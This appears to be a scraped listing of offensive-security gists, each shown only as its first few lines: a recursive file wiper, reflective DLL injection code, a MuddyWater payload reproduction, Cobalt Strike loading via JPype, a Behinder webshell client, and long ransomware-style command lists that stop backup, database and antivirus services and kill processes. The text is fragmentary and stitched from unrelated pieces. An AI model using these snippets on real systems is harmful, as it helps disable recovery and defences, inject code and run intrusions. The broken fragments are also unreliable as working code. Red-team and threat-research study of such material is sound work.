.\wipe <directory>
will rewrite all files in a directory recursively
| # adapted from https://stackoverflow.com/a/6291111 | |
| # | |
| # TargetObject = account with SPN | |
| # $TargeObject = "LDAP://CN=foo,CN=Users,DC=contoso,DC=local" | |
| # Identity = identity to be put in ACE | |
| # $Identity = [security.principal.ntaccount]"contoso\user" | |
| # $Identity = [security.principal.securityidentified]"S-1-1-0" | |
| # Deny = deny or allow access | |
| Function Set-SpnPermission { | |
| param( |
| using System; | |
| using System.IO; | |
| using System.Linq; | |
| using System.Security.Cryptography; | |
| using System.Collections.Generic; | |
| using System.Runtime.InteropServices; | |
| using System.Threading.Tasks; | |
| using Microsoft.Win32; | |
| public class Crypto |
| //modified from: https://www.ired.team/offensive-security/code-injection-process-injection/reflective-dll-injection | |
| #include <iostream> | |
| #include <windows.h> | |
| #include "resource.h" | |
| typedef struct BASE_RELOCATION_BLOCK { | |
| DWORD PageAddress; | |
| DWORD BlockSize; | |
| } BASE_RELOCATION_BLOCK, * PBASE_RELOCATION_BLOCK; |
| Payload used by MuddyWater as detailed here: https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html | |
| Replace "http://127.0.0.1:8000/cmd" with link to page containing command | |
| Command page should be something like: "c:\windows\system32\cmd.exe /c calc.exe" |
| # pip install JPype1 | |
| import jpype | |
| import jpype.imports | |
| from jpype.types import * | |
| import os | |
| os.chdir("<cobaltstrike directory>") # required for auth file lookup | |
| jpype.startJVM() | |
| jpype.addClassPath("<cobaltstrike directory>/cobaltstrike.jar") |
| @echo off | |
| setlocal enabledelayedexpansion | |
| set "true=1" | |
| :loop | |
| if defined true ( | |
| set /p c="%cd%> " | |
| start !c! | |
| set c= |
| net stop "Acronis VSS Provider" /y | |
| net stop "Enterprise Client Service" /y | |
| net stop "SQLsafe Backup Service" /y | |
| net stop "SQLsafe Filter Service" /y | |
| net stop "Veeam Backup Catalog Data Service" /y | |
| net stop AcronisAgent /y | |
| net stop AcrSch2Svc /y | |
| net stop Antivirus /y | |
| net stop ARSM /y | |
| net stop BackupExecAgentAccelerator /y |
| # Behinder Webshell Clients | |
| ## php_cmd.py | |
| Minimal client for Behinder PHP webshell (shell.php). Requires Cmd.php from the official client jar. |
| net1 stop samss /y | |
| net1 stop veeamcatalogsvc /y | |
| net1 stop veeamcloudsvc /y | |
| net1 stop veeamdeploysvc /y | |
| net.exe stop samss /y | |
| net.exe stop veeamcatalogsvc /y | |
| net.exe stop veeamcloudsvc /y | |
| net.exe stop veeamdeploysvc /y | |
| taskkill.exe /IM sqlbrowser.exe /F | |
| taskkill.exe /IM sqlceip.exe /F |